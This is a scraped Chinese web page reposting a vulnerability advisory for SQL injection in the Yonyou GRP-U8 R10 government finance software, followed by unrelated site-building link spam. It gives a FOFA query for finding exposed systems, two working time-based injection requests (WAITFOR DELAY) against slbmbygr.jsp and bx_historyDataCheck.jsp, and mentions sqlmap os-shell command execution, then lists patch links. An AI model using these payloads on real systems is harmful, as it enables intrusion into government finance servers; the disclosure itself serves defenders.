当前位置: 首页 > news >正文

延吉市网站建设无安全警告的浏览器

延吉市网站建设,无安全警告的浏览器,h5网站建设方案.doc,未备案网站通知0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业#xff0c;基于云计算技术所推出的新一代产品#xff0c;是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存…0x01 产品简介 用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业基于云计算技术所推出的新一代产品是我国行政事业财务领域最专业的政府财务管理软件。 0x02 漏洞概述 用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞由于用友GRP-U8未对用户的输入进行有效的过滤直接将其拼接进了SQL查询语句中导致系统出现SQL注入漏洞进一步利用可造成主机失陷。 0x03 影响范围 用友GRP-U8R10 U8Manager B、C、G 系列产品 20230905 0x04 复现环境 FOFAapp用友-GRP-U8 0x05 漏洞复现 PoC-1 GET /u8qx/slbmbygr.jsp?gsdm1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: your-ip 延时5秒 Sqlmap验证 PoC-2 POST /u8qx/bx_historyDataCheck.jsp HTTP/1.1 Host: your-ip Content-Type: application/x-www-form-urlencodeduserName;WAITFOR DELAY 0:0:6--class.module.classLoader.DefaultAssertionStatus 延时6秒 利用os-shell命令执行 0x06 修复建议 目前官方已发布更新补丁获取安全补丁方式如下 1. 百度云盘https://pan.baidu.com/s/1cQIxlUkpYAxE508EXjgQxA 提取码n1xy 2. 用友云盘https://pan.yonyou.com/s/gUWlv8QkSsY密码a61h 下载【20230905-关于用友GRP-U8 bx_historyDataCheck jsp存在SQL注入漏洞的解决方案.zip】 更新用友GRP-U8 Manager产品的2023年10月份日期大于等于均可标准补丁也可以修复此问题。
http://www.yutouwan.com/news/258791/

相关文章:

  • 购物网站建设容易出现的问题百度知识营销
  • 衡阳购物网站开发案例网站设计 宽度
  • 怎样自建网站网站推广服务属于广告吗
  • 电子商务网站开发主要有哪些项目进度计划甘特图
  • 室内效果图网站wordpress 导航调用
  • 网站做支付功能难吗公司网站的主页优化
  • 深圳网站哪家强怎么做qq网站
  • 网站栏目规划wordpress 随机缩略图
  • 租车网站建设方案网站开发新型技术
  • 网站建设里程碑新开传奇网站999新服网
  • 建设一个网站平台招聘网站开发的公司
  • 网站建设实训心得与建议大连网络营销公司排名
  • 17网站一起做网店质量怎么样网络运营师资格证
  • 珠海制作公司网站编程加盟一般多少钱
  • 网上书店网站开发代码在线图片编辑源码
  • 白云区网站建设dz网站收款即时到账怎么做的
  • 中山精品网站建设渠道网络服务器租赁费高吗
  • dw用设计视图做网站西安工程建设信息中心
  • 阿里云虚拟主机如何上传网站it企业网站模板下载
  • 成都手机网站建云主机是什么
  • 期货网站开发网站开发属于哪个部门
  • 微网站开发教材什么是软文文案
  • 蕲春县住房和城乡建设局网站太原网站建设设计
  • 单页网站设计欣赏给个免费网站好人有好报
  • 网站商城制作无锡网红餐厅
  • 设计微信网站建设做微信公众号海报的网站
  • 搭建手机网站网站建设的定义
  • 做网站选大公司好还是小公司好网络维护简历模板
  • 湘潭网站建设 地址磐石网络公益手游app平台
  • 浙江江能建设有限公司网站今天最新的招聘信息